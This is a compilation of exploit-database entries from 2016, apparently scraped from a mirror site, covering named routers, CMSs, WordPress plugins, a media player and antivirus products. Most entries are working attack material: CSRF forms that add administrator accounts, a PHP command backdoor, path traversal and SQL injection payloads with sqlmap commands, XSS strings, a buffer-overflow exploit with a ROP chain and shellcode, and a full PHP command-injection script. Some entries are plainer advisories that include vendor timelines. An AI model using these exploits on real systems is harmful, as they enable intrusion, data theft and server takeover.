# Date: 01/06/2016
# Author: Matt O'Connor
# Advisory Link:  https://www.rgb.ie/magnet-broadband-weak-wpa-psk-algorithm.pdf
# Version: 
# Category: Remote
# Tested on: Magnet Networks Tesley CPVA 642


The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
 
The WPA-PSK pass phrase has the following features:

• Starts with MAGNET0
• Adds six random numerical digits 
• 1 million possible combinations ( MAGNET0000000 – MAGNET0999999 ) 
 
The entire keyspace can be generated using “mask processor” by ATOM, piping each letter out to its own file, for example:

./mp32 MAGNET0?1?1?1?1?1?1 > magnet_networks_tesley_ks.txt

The .txt file weighs in at around 45mb.  

Using a 1.4ghz i3 processor on a budget laptop, we were hitting 1,000 keys per second.  Breakdown below:

• 1,000,000 / 1,000 keys per second = 1,000 seconds
• 1,000 / 60 seconds = 16~ minutes

The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.

If you’re using the default password on your Magnet Networks Tesley CPVA 642 Router, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.

On the 20th of June 2016, Magnet Networks Customer Care confirmed via email that these routers are not used by Magnet Networks anymore.
HireHackking 
<!--
# Exploit Title: IonizeCMS <= 1.0.8 Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://ionizecms.com/
# Software Link: https://github.com/ionize/ionize/archive/1.0.8.1.zip
# Version: 1.0.8
# Tested on: Ubuntu 16.04

IonizeCMS is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://localhost/en/admin/user/save) that will add a
new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/en/admin/auth/login)
using the username and the password he posted in the form.

CSRF PoC Code
=============
-->

<form method="post" action="http://localhost/en/admin/user/save">   
<input type="hidden" name="id_user"/>
<input type="hidden" name="join_date"/>
<input type="hidden" name="salt"/>
<input type="hidden" name="from"/>
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="screen_name" value="attacker">
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="id_role" value="2"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="password2" value="attackerPassword"/>
</form>
<script>
document.forms[0].submit();
</script>
HireHackking 
<!--	
# Exploit Title: XuezhuLi FileSharing - CSRF(Add User)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->

<form name="csrf_poc" action="http://127.0.0.1/vul_test/FileSharing/signup.php" method="POST">
<input type="hidden" name="sign" value="ok">
<input type="hidden" name="newuser" value="csrf_test">

<input type="submit" value="Replay!">
</form>

<script type="text/javascript">document.forms.csrf_poc.submit();</script>

<!--
Output.
#> cat /srv/userlists.txt 
aaaa
csrf_test

-->
HireHackking 
# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
# Google Dork: -
# Date: 23/06/2016
# Exploit Author: s0nk3y
# Vendor Homepage: http://get-simple.info/
# Category: webapps
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
# Version: 3.3.10
# Tested on: Ubuntu 16.04 / Mozilla Firefox
# Twitter: http://twitter.com/s0nk3y
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi

Description
========================

GetSimple CMS has been downloaded over 120,000 times (as of March 2013). 
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises 
the simplicity yet possible extensibility through plug-ins.

Vulnerability
========================

GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability 
which allows an attacker to upload a backdoor.

This vulnerability is that the application uses a blacklist and whitelist 
technique to compare the file against mime types and extensions.

Proof of Concept
========================

For exploiting this vulnerability we will create a file by adding the percent 
behind extension.
1. evil.php% <--- this is simple trick :)
<?php
// simple backdoor
system($_GET['cmd']);
?>
2. An attacker login to the admin page and uploading the backdoor
3. The uploaded file will be under the "/data/uploads/" folder

Report Timeline
========================
2016-06-23 : Vulnerability reported to vendor
2016-06-23 : Disclosure
HireHackking 
# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/XuezhuLi
# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability
 1. download.php -> file_name parameter
 2. viewing.php  -> file_name parameter

### Vulnerability 1 - download.php
GET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:17:58 GMT
..snip..
Content-Type: application/octet-stream


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
### Vulnerability 2 - viewing.php
GET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1
Connection: keep-alive

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2016 06:19:49 GMT
Server: Apache/2.4.10 (Ubuntu)
..snip..
Content-Type: text/plain;charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
HireHackking 
# Exploit Title: FinderView - Multiple Vulnerability(Path Traversal/Reflected XSS)
# Date: 2016-06-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/proin/
# Software Link: https://github.com/proin/FinderView/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability1 - Path Traversal(view directory)
Request
GET /vul_test/FinderView/api.php?callback=jQuery21107685743998649676_1466662516225&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=1466662516227 HTTP/1.1
Host: 127.0.0.1
..snip..
Connection: keep-alive

Response
jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderuri":"Li4vLi4vLi4vLi4vYmFja3Vwcw==","folderuri_nobase":"../../../../backups","size":"0.0 KB","date":"15 June 2016"},
..snip..
,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January

### Vulnerability2 - Reflected XSS
http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280
HireHackking 
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox. 
# Demo: https://youtu.be/FSRZlD3SVQc

====================
 DESCRIPTION
====================

An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote 
attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.

===================
 STEPS TO REPRODUCE
===================

1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.

================
 Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check for file extensions.

function UPCP_Handle_File_Upload($Field_Name) {
	..		
	if (!is_user_logged_in()) {exit();}
		/* Make sure that the file exists */ 	 	
		elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
			$error = __('No file was uploaded here..', 'UPCP');
		}
		/* Move the file and store the URL to pass it onwards*/ 	 	
		else {				 
		 	  $msg .= $_FILES[$Field_Name]['name'];
			//for security reason, we force to remove all uploaded file
			$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
			//create the uploads directory if it doesn't exist
			if (!file_exists($target_path)) {
				  mkdir($target_path, 0777, true);
			}
			$target_path = $target_path . basename( $_FILES[$Field_Name]['name']); 
			if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
				//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
	 			  $error .= "There was an error uploading the file, please try again!";
			}
	...
}

?>

==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
	joaquin.ramirez.mtz.lab[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


==========
time-line
==========

2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclousure
===================================
HireHackking 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3 
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista


Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@


File: zanzam.php
Parameter: detail_num



Test > http://localhost:8888/zaznam.php?detail_num=1'


Response:

24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...
HireHackking 
#!/usr/bin/env python
#
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
# Date: 26-06-2016
# Exploit Author: secfigo
# Vendor Homepage: http://vuplayer.com/
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe 
# Version: VUPlayer <=2.49
# Tested on: Windows 7 SP1 DEP=alwayson
# Greetz: Raghu, nullSingapore
###################################################################################


import struct

###################################################################################
# Shellcode
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
###################################################################################

shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")

junk = "HTTP://" + "A"*1005




###################################################################################
# rop gadgets with some modifications
# bad characters = "\x00\x09\x0a\x0d\x1a"
###################################################################################

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x10010157,  # POP EBP # RETN [BASS.dll] 
      0x10010157,  # skip 4 bytes [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
      0x10015f82,  # POP EAX # RETN [BASS.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll] 
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
      0x101082db,  # &Writable location [BASSWMA.dll]
      0x1001621c,  # POP EDI # RETN [BASS.dll] 
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
      0x10015fe7,  # POP EAX # RETN [BASS.dll] 
      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)

nops ="\x90"* 16

buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))

print "[+] Creating .m3u file of size "+ str(len(buffer))
file = open('vuplayer-dep.m3u','w');
file.write(buffer);
file.close();
print "[+] Done creating the file"
HireHackking 
/*
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt

[+] ISR: APPARITIONSEC


Vendor:
=================
mylittleforum.net

Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5


Product:
===================
MyLittleForum 2.3.5

my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity.
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.


Vulnerability Type:
=======================
PHP Command Execution


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

When setting up mylittleforum CMS users will have to walk thru an
installation script and provide details for the application like the
forums email address, name, admin email, admin password, database name
etc...

However, no input validation / checks exists for that installation script.
Low privileged users can then supply arbitrary PHP code for
the Database Name. The PHP command values will get written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name a MySQL error will be thrown but the
injected PHP payload will also be executed on the host system.

If the CMS is installed by low privileged user and that user has basic
MySQL database authorization to run the install for the CMS it
can result in a privilege escalation, remote command execution and complete
takeover of the host server.

The /config/db_settings.php is protected by .htaccess file but we can write
directly to "db_settings.php" file and execute code directly
from /install/index.php file bypassing any access control provided by the
.htaccess file or we just delete it by adding call to PHP function
@unlink('.htaccess') to our injected PHP payload.


1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php


2) For Database Name input field enter the below PHP code for POC.
';?><?php echo passthru('/bin/cat /etc/passwd');'

This results in config/db_settings.php file being injected with our
arbitrary PHP code.
$db_settings['database'] = '';?><?php echo passthru('/bin/cat
/etc/passwd');'';


3) Make another HTTP GET request to same page "/install/index.php" file and
done!... we access /etc/passwd system file.


HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 03:01:13 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

etc...


Exploit code(s):
===============

1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
*/

<?php
#mylittleforum-2.3.5 PHP CMD Execution Exploit
#by hyp3rlinx
#ISR: apparitionsec
#hyp3rlinx.altervista.org
#cat Linux system file '/etc/passwd' POC
#tested RH Linux 5
#=======================================================

if($argc<5){
echo "myLittleForum CMS PHP Command Execution Exploit\r\n";
echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n";
echo "================= by hyp3rlinx ===================\r\n";
exit();
}

$port=80;                   #Default port
$victim=$argv[1];           #IP
$user=$argv[2];             #MySQL username
$pwd=$argv[3];              #MySQL password
$root_dir=$argv[4];         #/mylittleforum-2.3.5
$uri="/install/index.php";  #PHP CMD inject entry point

$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}

$CMD_INJECTTION="forum_name=PWN".
               "&forum_address=http://$victim/$root_dir/".
"&forum_email=x@x.com".
"&admin_name=$user".
"&admin_email=x@x.com".
"&admin_pw=$pwd".
"&admin_pw_conf=$pwd".
"&host=localhost".
"&database=';?><?php echo passthru('/bin/cat /etc/passwd');'".
"&user=$user".
"&password=$pwd".
"&table_prefix=mlf2_".
"&install_submit=OK+-+Install+forum".
"&language_file=english.lang";

    #Inject commands
    $out = "POST /$root_dir/$uri HTTP/1.1\r\n";
    $out .= "Host: $victim\r\n";
    $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $out .= 'Content-Length: ' . strlen($CMD_INJECTTION) . "\r\n";
    $out .= "Connection: close\r\n\r\n";
    fwrite($s, $out);
    fwrite($s, $CMD_INJECTTION);
    fclose($s);
    sleep(2);

    #Second HTTP request to read Linux /etc/passwd file in the response
    $out="";
    $s = fsockopen($victim, $port, $errno, $errstr, 10);
    $out = "GET /$root_dir/$uri HTTP/1.1\r\n";
    $out .= "Host: $victim\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($s, $out);

    $r='';

     while (!feof($s)) {
         $r=fgets($s, 128);
         echo $r;
        if(strpos($r,'<!DOCTYPE')!==FALSE){
           break;
         }
       }
fclose($s);
?>

/*
Disclosure Timeline:
=================================
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure


Exploitation Technique:
=======================
Remote


Severity Level:
===========================================
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
*/
HireHackking 
# Exploit Title: Panda Security Privilege Escalation
# Date: 27/6/2016
# Exploit Author: Security-Assessment.com
# Vendor Homepage: http://www.pandasecurity.com
# Version: Panda Global Protection 2016 (16.1.2),Panda Antivirus Pro 2016 (16.1.2),Panda Small Business Protection (16.1.2),Panda Internet Security 2016 (16.1.2)
# Tested on: Windows 10

Panda Security – Privilege Escalation

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

		presents..
Panda Security - Privilege Escalation
Affected Software -
	Panda Global Protection 2016 (16.1.2)
	Panda Antivirus Pro 2016 (16.1.2)
	Panda Small Business Protection (16.1.2)
	Panda Internet Security 2016 (16.1.2)
Testing Environment - Windows 10
PDF: http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf

+-------------+
| Description |
+-------------+
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System.

+--------------+
| Exploitation |
+--------------+
“PSEvents.exe” is scheduled to be executed every hour with SYSTEM Privileges. When executed, it tries to locate a number of DLLs in its local directory to be loaded. However, some of these DLLs don’t exist.
 
The DACLs of the directory that contains the “PSEvents.exe” executable allow a user in the USERS group to create files in that directory. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and name it as one of the missing DLLs. After one hour, the “PSEvents.exe” process will start and load our malicious DLL

The same method can be used to exploit other executables (PSDevice.exe and PSProfiler.exe) located in Panda’s Downloads directory.


+----------+
| Solution |
+----------+
Install Panda’s Hotfix for this vulnerability.
http://www.pandasecurity.com/uk/support/card?id=100053

+----------+
| Timeline |
+----------+
10/5/2016 - Exchange PGP
11/5/2016 - Advisory sent to Panda Security
14/5/2016 - Confirm receipt of the advisory
23/5/2016 - Email Panda Security for update
01/6/2016 - Panda Security reply that they have a fix in development.
16/6/2016 - Panda Security send hotfix to verify if it fixes the vulnerability.
21/6/2016 - Panda Security schedule to release the hotfix on 24/6/2016
24/6/2016 - Hotfix released
27/6/2016 - Advisory released 

+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:

Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
HireHackking 
######################
# Application Name : Kagao v3.0 - Professional Classified Market

# Google Dork : inurl:/cat1.php?id2=

# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL

# Vendor Homepage : http://kogaoscript.com/

# Vulnerable Type : SQL Injection & Cross Site Scripting

# Date : 2016-06-26

# Tested on : Windows 10 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0.6.28#dev

###################### SQL Injection Vulnerability ######################

# Location :
http://localhost/[path]/cat1.php

######################

# Vulnerable code :

function pagenat(){

$buildLink = array(
"id" => intval($_GET['id']),
"id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '',
"suche" => htmlspecialchars($_GET['suche']),
"sucheWo" => htmlspecialchars($_GET['sucheWo']),
"umkreis" => intval($_GET['umkreis']),
"page" => ""

);

$buildLink = http_build_query($buildLink);
$buildLink = 'cat1.php?' . $buildLink;

if($_GET['id2']){
$pages_num = getZahlPage($_GET['id2'], 'unterkategorie');
}
else{
$pages_num = getZahlPage($_GET['id'], 'kategorie');
}

$page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1;
$pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : '';
echo $pages;
}


######################

# PoC Exploit:

http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a

# Exploit Code via sqlmap:

sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast

Parameter: id2 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN
---

###################### Cross Site Scripting Vulnerability ######################

# PoC Exploit:

Search: "><script>alert('n4tural');</script>

http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0

######################
HireHackking 

Option CloudGate Insecure Direct Object References Authorization Bypass


Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897

Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.

Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.

Tested on: lighttpd 1.4.39
           firmware 2.62.4


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php


11.06.2016

--


GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
